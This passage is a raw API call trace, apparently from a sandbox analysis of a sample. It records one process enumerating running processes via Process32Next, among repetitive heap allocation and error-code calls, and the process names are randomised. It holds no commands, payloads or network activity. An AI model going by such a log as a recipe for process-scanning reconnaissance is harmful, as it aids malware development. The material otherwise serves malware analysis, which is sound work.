hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970538 | out: hHeap=0x29a0000) returned 1 [0110.328] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a69b8 | out: hHeap=0x29a0000) returned 1 [0110.328] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c60 | out: hHeap=0x29a0000) returned 1 [0110.328] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6958 | out: hHeap=0x29a0000) returned 1 [0110.328] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.328] GetLastError () returned 0x0 [0110.328] SetLastError (dwErrCode=0x0) [0110.329] GetLastError () returned 0x0 [0110.329] SetLastError (dwErrCode=0x0) [0110.329] GetLastError () returned 0x0 [0110.329] SetLastError (dwErrCode=0x0) [0110.329] GetLastError () returned 0x0 [0110.329] SetLastError (dwErrCode=0x0) [0110.329] GetLastError () returned 0x0 [0110.329] SetLastError (dwErrCode=0x0) [0110.329] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0110.329] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="daughter indeed.exe")) returned 1 [0110.330] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6878 [0110.330] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970b80 [0110.330] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a69b8 [0110.330] GetLastError () returned 0x0 [0110.330] SetLastError (dwErrCode=0x0) [0110.330] GetLastError () returned 0x0 [0110.331] SetLastError (dwErrCode=0x0) [0110.331] GetLastError () returned 0x0 [0110.331] SetLastError (dwErrCode=0x0) [0110.331] GetLastError () returned 0x0 [0110.331] SetLastError (dwErrCode=0x0) [0110.331] GetLastError () returned 0x0 [0110.331] SetLastError (dwErrCode=0x0) [0110.331] GetLastError () returned 0x0 [0110.331] SetLastError (dwErrCode=0x0) [0110.331] GetLastError () returned 0x0 [0110.331] SetLastError (dwErrCode=0x0) [0110.331] GetLastError () returned 0x0 [0110.331] SetLastError (dwErrCode=0x0) [0110.331] GetLastError () returned 0x0 [0110.331] SetLastError (dwErrCode=0x0) [0110.331] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970420 [0110.331] GetLastError () returned 0x0 [0110.331] SetLastError (dwErrCode=0x0) [0110.331] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970420 | out: hHeap=0x29a0000) returned 1 [0110.331] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a69b8 | out: hHeap=0x29a0000) returned 1 [0110.332] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970b80 | out: hHeap=0x29a0000) returned 1 [0110.332] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6878 | out: hHeap=0x29a0000) returned 1 [0110.332] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.332] GetLastError () returned 0x0 [0110.332] SetLastError (dwErrCode=0x0) [0110.332] GetLastError () returned 0x0 [0110.332] SetLastError (dwErrCode=0x0) [0110.332] GetLastError () returned 0x0 [0110.332] SetLastError (dwErrCode=0x0) [0110.332] GetLastError () returned 0x0 [0110.332] SetLastError (dwErrCode=0x0) [0110.332] GetLastError () returned 0x0 [0110.332] SetLastError (dwErrCode=0x0) [0110.332] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0110.332] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xcb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="generationtop.exe")) returned 1 [0110.333] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6948 [0110.333] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970ea0 [0110.333] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6848 [0110.333] GetLastError () returned 0x0 [0110.333] SetLastError (dwErrCode=0x0) [0110.333] GetLastError () returned 0x0 [0110.334] SetLastError (dwErrCode=0x0) [0110.334] GetLastError () returned 0x0 [0110.334] SetLastError (dwErrCode=0x0) [0110.334] GetLastError () returned 0x0 [0110.334] SetLastError (dwErrCode=0x0) [0110.334] GetLastError () returned 0x0 [0110.334] SetLastError (dwErrCode=0x0) [0110.334] GetLastError () returned 0x0 [0110.334] SetLastError (dwErrCode=0x0) [0110.334] GetLastError () returned 0x0 [0110.334] SetLastError (dwErrCode=0x0) [0110.334] GetLastError () returned 0x0 [0110.334] SetLastError (dwErrCode=0x0) [0110.334] GetLastError () returned 0x0 [0110.334] SetLastError (dwErrCode=0x0) [0110.334] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706c8 [0110.334] GetLastError () returned 0x0 [0110.334] SetLastError (dwErrCode=0x0) [0110.334] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706c8 | out: hHeap=0x29a0000) returned 1 [0110.334] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6848 | out: hHeap=0x29a0000) returned 1 [0110.334] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ea0 | out: hHeap=0x29a0000) returned 1 [0110.334] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6948 | out: hHeap=0x29a0000) returned 1 [0110.335] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703f8 [0110.335] GetLastError () returned 0x0 [0110.335] SetLastError (dwErrCode=0x0) [0110.335] GetLastError () returned 0x0 [0110.335] SetLastError (dwErrCode=0x0) [0110.335] GetLastError () returned 0x0 [0110.335] SetLastError (dwErrCode=0x0) [0110.335] GetLastError () returned 0x0 [0110.335] SetLastError (dwErrCode=0x0) [0110.335] GetLastError () returned 0x0 [0110.335] SetLastError (dwErrCode=0x0) [0110.335] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703f8 | out: hHeap=0x29a0000) returned 1 [0110.335] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="riseleadnice.exe")) returned 1 [0110.336] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a69d8 [0110.336] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970ec0 [0110.336] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6818 [0110.336] GetLastError () returned 0x0 [0110.336] SetLastError (dwErrCode=0x0) [0110.336] GetLastError () returned 0x0 [0110.336] SetLastError (dwErrCode=0x0) [0110.336] GetLastError () returned 0x0 [0110.336] SetLastError (dwErrCode=0x0) [0110.337] GetLastError () returned 0x0 [0110.337] SetLastError (dwErrCode=0x0) [0110.337] GetLastError () returned 0x0 [0110.337] SetLastError (dwErrCode=0x0) [0110.337] GetLastError () returned 0x0 [0110.337] SetLastError (dwErrCode=0x0) [0110.337] GetLastError () returned 0x0 [0110.337] SetLastError (dwErrCode=0x0) [0110.337] GetLastError () returned 0x0 [0110.337] SetLastError (dwErrCode=0x0) [0110.337] GetLastError () returned 0x0 [0110.337] SetLastError (dwErrCode=0x0) [0110.337] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706a0 [0110.337] GetLastError () returned 0x0 [0110.337] SetLastError (dwErrCode=0x0) [0110.337] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706a0 | out: hHeap=0x29a0000) returned 1 [0110.337] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6818 | out: hHeap=0x29a0000) returned 1 [0110.337] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ec0 | out: hHeap=0x29a0000) returned 1 [0110.337] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a69d8 | out: hHeap=0x29a0000) returned 1 [0110.337] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970538 [0110.338] GetLastError () returned 0x0 [0110.338] SetLastError (dwErrCode=0x0) [0110.338] GetLastError () returned 0x0 [0110.338] SetLastError (dwErrCode=0x0) [0110.338] GetLastError () returned 0x0 [0110.338] SetLastError (dwErrCode=0x0) [0110.338] GetLastError () returned 0x0 [0110.338] SetLastError (dwErrCode=0x0) [0110.338] GetLastError () returned 0x0 [0110.338] SetLastError (dwErrCode=0x0) [0110.338] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970538 | out: hHeap=0x29a0000) returned 1 [0110.338] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="him.exe")) returned 1 [0110.339] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a69d8 [0110.339] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970d40 [0110.339] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6968 [0110.340] GetLastError () returned 0x0 [0110.340] SetLastError (dwErrCode=0x0) [0110.340] GetLastError () returned 0x0 [0110.340] SetLastError (dwErrCode=0x0) [0110.340] GetLastError () returned 0x0 [0110.340] SetLastError (dwErrCode=0x0) [0110.340] GetLastError () returned 0x0 [0110.340] SetLastError (dwErrCode=0x0) [0110.340] GetLastError () returned 0x0 [0110.340] SetLastError (dwErrCode=0x0) [0110.340] GetLastError () returned 0x0 [0110.340] SetLastError (dwErrCode=0x0) [0110.340] GetLastError () returned 0x0 [0110.340] SetLastError (dwErrCode=0x0) [0110.340] GetLastError () returned 0x0 [0110.340] SetLastError (dwErrCode=0x0) [0110.340] GetLastError () returned 0x0 [0110.340] SetLastError (dwErrCode=0x0) [0110.341] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970678 [0110.341] GetLastError () returned 0x0 [0110.341] SetLastError (dwErrCode=0x0) [0110.341] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970678 | out: hHeap=0x29a0000) returned 1 [0110.341] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6968 | out: hHeap=0x29a0000) returned 1 [0110.341] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d40 | out: hHeap=0x29a0000) returned 1 [0110.341] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a69d8 | out: hHeap=0x29a0000) returned 1 [0110.341] GetLastError () returned 0x0 [0110.341] SetLastError (dwErrCode=0x0) [0110.341] GetLastError () returned 0x0 [0110.341] SetLastError (dwErrCode=0x0) [0110.341] GetLastError () returned 0x0 [0110.341] SetLastError (dwErrCode=0x0) [0110.341] GetLastError () returned 0x0 [0110.341] SetLastError (dwErrCode=0x0) [0110.341] GetLastError () returned 0x0 [0110.341] SetLastError (dwErrCode=0x0) [0110.342] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="effort_network.exe")) returned 1 [0110.342] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6998 [0110.343] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970d40 [0110.343] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6818 [0110.343] GetLastError () returned 0x0 [0110.343] SetLastError (dwErrCode=0x0) [0110.343] GetLastError () returned 0x0 [0110.343] SetLastError (dwErrCode=0x0) [0110.343] GetLastError () returned 0x0 [0110.343] SetLastError (dwErrCode=0x0) [0110.343] GetLastError () returned 0x0 [0110.343] SetLastError (dwErrCode=0x0) [0110.343] GetLastError () returned 0x0 [0110.343] SetLastError (dwErrCode=0x0) [0110.343] GetLastError () returned 0x0 [0110.343] SetLastError (dwErrCode=0x0) [0110.343] GetLastError () returned 0x0 [0110.344] SetLastError (dwErrCode=0x0) [0110.344] GetLastError () returned 0x0 [0110.344] SetLastError (dwErrCode=0x0) [0110.344] GetLastError () returned 0x0 [0110.344] SetLastError (dwErrCode=0x0) [0110.344] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970678 [0110.344] GetLastError () returned 0x0 [0110.344] SetLastError (dwErrCode=0x0) [0110.344] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970678 | out: hHeap=0x29a0000) returned 1 [0110.344] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6818 | out: hHeap=0x29a0000) returned 1 [0110.344] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d40 | out: hHeap=0x29a0000) returned 1 [0110.344] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6998 | out: hHeap=0x29a0000) returned 1 [0110.344] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705b0 [0110.344] GetLastError () returned 0x0 [0110.344] SetLastError (dwErrCode=0x0) [0110.344] GetLastError () returned 0x0 [0110.344] SetLastError (dwErrCode=0x0) [0110.345] GetLastError () returned 0x0 [0110.345] SetLastError (dwErrCode=0x0) [0110.345] GetLastError () returned 0x0 [0110.345] SetLastError (dwErrCode=0x0) [0110.345] GetLastError () returned 0x0 [0110.345] SetLastError (dwErrCode=0x0) [0110.345] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39705b0 | out: hHeap=0x29a0000) returned 1 [0110.345] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="eighteye.exe")) returned 1 [0110.346] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68f8 [0110.346] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970ca0 [0110.346] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6828 [0110.347] GetLastError () returned 0x0 [0110.347] SetLastError (dwErrCode=0x0) [0110.347] GetLastError () returned 0x0 [0110.347] SetLastError (dwErrCode=0x0) [0110.347] GetLastError () returned 0x0 [0110.347] SetLastError (dwErrCode=0x0) [0110.347] GetLastError () returned 0x0 [0110.347] SetLastError (dwErrCode=0x0) [0110.347] GetLastError () returned 0x0 [0110.347] SetLastError (dwErrCode=0x0) [0110.347] GetLastError () returned 0x0 [0110.348] SetLastError (dwErrCode=0x0) [0110.348] GetLastError () returned 0x0 [0110.348] SetLastError (dwErrCode=0x0) [0110.348] GetLastError () returned 0x0 [0110.348] SetLastError (dwErrCode=0x0) [0110.348] GetLastError () returned 0x0 [0110.348] SetLastError (dwErrCode=0x0) [0110.348] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706f0 [0110.348] GetLastError () returned 0x0 [0110.348] SetLastError (dwErrCode=0x0) [0110.348] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706f0 | out: hHeap=0x29a0000) returned 1 [0110.348] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6828 | out: hHeap=0x29a0000) returned 1 [0110.348] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ca0 | out: hHeap=0x29a0000) returned 1 [0110.348] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68f8 | out: hHeap=0x29a0000) returned 1 [0110.348] GetLastError () returned 0x0 [0110.349] SetLastError (dwErrCode=0x0) [0110.349] GetLastError () returned 0x0 [0110.349] SetLastError (dwErrCode=0x0) [0110.349] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x667) returned 0x29a7310 [0110.349] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6ec0 | out: hHeap=0x29a0000) returned 1 [0110.349] GetLastError () returned 0x0 [0110.349] SetLastError (dwErrCode=0x0) [0110.349] GetLastError () returned 0x0 [0110.349] SetLastError (dwErrCode=0x0) [0110.349] GetLastError () returned 0x0 [0110.349] SetLastError (dwErrCode=0x0) [0110.349] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nice_million.exe")) returned 1 [0110.350] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6928 [0110.350] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970d20 [0110.350] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6908 [0110.350] GetLastError () returned 0x0 [0110.351] SetLastError (dwErrCode=0x0) [0110.351] GetLastError () returned 0x0 [0110.351] SetLastError (dwErrCode=0x0) [0110.351] GetLastError () returned 0x0 [0110.351] SetLastError (dwErrCode=0x0) [0110.351] GetLastError () returned 0x0 [0110.351] SetLastError (dwErrCode=0x0) [0110.351] GetLastError () returned 0x0 [0110.351] SetLastError (dwErrCode=0x0) [0110.351] GetLastError () returned 0x0 [0110.351] SetLastError (dwErrCode=0x0) [0110.351] GetLastError () returned 0x0 [0110.351] SetLastError (dwErrCode=0x0) [0110.351] GetLastError () returned 0x0 [0110.351] SetLastError (dwErrCode=0x0) [0110.351] GetLastError () returned 0x0 [0110.351] SetLastError (dwErrCode=0x0) [0110.352] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970588 [0110.352] GetLastError () returned 0x0 [0110.352] SetLastError (dwErrCode=0x0) [0110.352] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970588 | out: hHeap=0x29a0000) returned 1 [0110.352] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6908 | out: hHeap=0x29a0000) returned 1 [0110.352] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d20 | out: hHeap=0x29a0000) returned 1 [0110.352] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6928 | out: hHeap=0x29a0000) returned 1 [0110.352] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706f0 [0110.352] GetLastError () returned 0x0 [0110.352] SetLastError (dwErrCode=0x0) [0110.352] GetLastError () returned 0x0 [0110.352] SetLastError (dwErrCode=0x0) [0110.352] GetLastError () returned 0x0 [0110.352] SetLastError (dwErrCode=0x0) [0110.352] GetLastError () returned 0x0 [0110.352] SetLastError (dwErrCode=0x0) [0110.352] GetLastError () returned 0x0 [0110.353] SetLastError (dwErrCode=0x0) [0110.353] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706f0 | out: hHeap=0x29a0000) returned 1 [0110.353] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young.exe")) returned 1 [0110.353] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6898 [0110.354] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970d00 [0110.354] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6918 [0110.354] GetLastError () returned 0x0 [0110.354] SetLastError (dwErrCode=0x0) [0110.354] GetLastError () returned 0x0 [0110.354] SetLastError (dwErrCode=0x0) [0110.354] GetLastError () returned 0x0 [0110.354] SetLastError (dwErrCode=0x0) [0110.354] GetLastError () returned 0x0 [0110.354] SetLastError (dwErrCode=0x0) [0110.354] GetLastError () returned 0x0 [0110.354] SetLastError (dwErrCode=0x0) [0110.354] GetLastError () returned 0x0 [0110.354] SetLastError (dwErrCode=0x0) [0110.354] GetLastError () returned 0x0 [0110.355] SetLastError (dwErrCode=0x0) [0110.355] GetLastError () returned 0x0 [0110.355] SetLastError (dwErrCode=0x0) [0110.355] GetLastError () returned 0x0 [0110.355] SetLastError (dwErrCode=0x0) [0110.355] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703f8 [0110.355] GetLastError () returned 0x0 [0110.355] SetLastError (dwErrCode=0x0) [0110.355] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703f8 | out: hHeap=0x29a0000) returned 1 [0110.355] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6918 | out: hHeap=0x29a0000) returned 1 [0110.355] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d00 | out: hHeap=0x29a0000) returned 1 [0110.355] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6898 | out: hHeap=0x29a0000) returned 1 [0110.355] GetLastError () returned 0x0 [0110.355] SetLastError (dwErrCode=0x0) [0110.355] GetLastError () returned 0x0 [0110.355] SetLastError (dwErrCode=0x0) [0110.355] GetLastError () returned 0x0 [0110.356] SetLastError (dwErrCode=0x0) [0110.356] GetLastError () returned 0x0 [0110.356] SetLastError (dwErrCode=0x0) [0110.356] GetLastError () returned 0x0 [0110.356] SetLastError (dwErrCode=0x0) [0110.356] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x808, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="avoid_figure.exe")) returned 1 [0110.357] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6978 [0110.357] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970c80 [0110.357] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6848 [0110.357] GetLastError () returned 0x0 [0110.357] SetLastError (dwErrCode=0x0) [0110.357] GetLastError () returned 0x0 [0110.357] SetLastError (dwErrCode=0x0) [0110.357] GetLastError () returned 0x0 [0110.358] SetLastError (dwErrCode=0x0) [0110.358] GetLastError () returned 0x0 [0110.358] SetLastError (dwErrCode=0x0) [0110.358] GetLastError () returned 0x0 [0110.358] SetLastError (dwErrCode=0x0) [0110.358] GetLastError () returned 0x0 [0110.358] SetLastError (dwErrCode=0x0) [0110.358] GetLastError () returned 0x0 [0110.358] SetLastError (dwErrCode=0x0) [0110.358] GetLastError () returned 0x0 [0110.358] SetLastError (dwErrCode=0x0) [0110.358] GetLastError () returned 0x0 [0110.358] SetLastError (dwErrCode=0x0) [0110.358] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970498 [0110.358] GetLastError () returned 0x0 [0110.358] SetLastError (dwErrCode=0x0) [0110.358] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970498 | out: hHeap=0x29a0000) returned 1 [0110.359] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6848 | out: hHeap=0x29a0000) returned 1 [0110.359] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c80 | out: hHeap=0x29a0000) returned 1 [0110.359] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6978 | out: hHeap=0x29a0000) returned 1 [0110.359] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970588 [0110.359] GetLastError () returned 0x0 [0110.359] SetLastError (dwErrCode=0x0) [0110.359] GetLastError () returned 0x0 [0110.359] SetLastError (dwErrCode=0x0) [0110.359] GetLastError () returned 0x0 [0110.359] SetLastError (dwErrCode=0x0) [0110.359] GetLastError () returned 0x0 [0110.359] SetLastError (dwErrCode=0x0) [0110.359] GetLastError () returned 0x0 [0110.359] SetLastError (dwErrCode=0x0) [0110.359] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970588 | out: hHeap=0x29a0000) returned 1 [0110.359] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge.exe")) returned 1 [0110.361] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6858 [0110.361] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970ec0 [0110.362] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68d8 [0110.362] GetLastError () returned 0x0 [0110.362] SetLastError (dwErrCode=0x0) [0110.362] GetLastError () returned 0x0 [0110.362] SetLastError (dwErrCode=0x0) [0110.362] GetLastError () returned 0x0 [0110.362] SetLastError (dwErrCode=0x0) [0110.362] GetLastError () returned 0x0 [0110.362] SetLastError (dwErrCode=0x0) [0110.362] GetLastError () returned 0x0 [0110.362] SetLastError (dwErrCode=0x0) [0110.362] GetLastError () returned 0x0 [0110.362] SetLastError (dwErrCode=0x0) [0110.362] GetLastError () returned 0x0 [0110.362] SetLastError (dwErrCode=0x0) [0110.362] GetLastError () returned 0x0 [0110.362] SetLastError (dwErrCode=0x0) [0110.362] GetLastError () returned 0x0 [0110.362] SetLastError (dwErrCode=0x0) [0110.363] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703d0 [0110.363] GetLastError () returned 0x0 [0110.363] SetLastError (dwErrCode=0x0) [0110.363] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703d0 | out: hHeap=0x29a0000) returned 1 [0110.363] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68d8 | out: hHeap=0x29a0000) returned 1 [0110.363] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ec0 | out: hHeap=0x29a0000) returned 1 [0110.363] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6858 | out: hHeap=0x29a0000) returned 1 [0110.363] GetLastError () returned 0x0 [0110.363] SetLastError (dwErrCode=0x0) [0110.363] GetLastError () returned 0x0 [0110.363] SetLastError (dwErrCode=0x0) [0110.363] GetLastError () returned 0x0 [0110.363] SetLastError (dwErrCode=0x0) [0110.363] GetLastError () returned 0x0 [0110.363] SetLastError (dwErrCode=0x0) [0110.364] GetLastError () returned 0x0 [0110.364] SetLastError (dwErrCode=0x0) [0110.364] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="behaviorreligious.exe")) returned 1 [0110.364] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6908 [0110.365] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970c20 [0110.365] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a69b8 [0110.365] GetLastError () returned 0x0 [0110.365] SetLastError (dwErrCode=0x0) [0110.365] GetLastError () returned 0x0 [0110.365] SetLastError (dwErrCode=0x0) [0110.365] GetLastError () returned 0x0 [0110.365] SetLastError (dwErrCode=0x0) [0110.365] GetLastError () returned 0x0 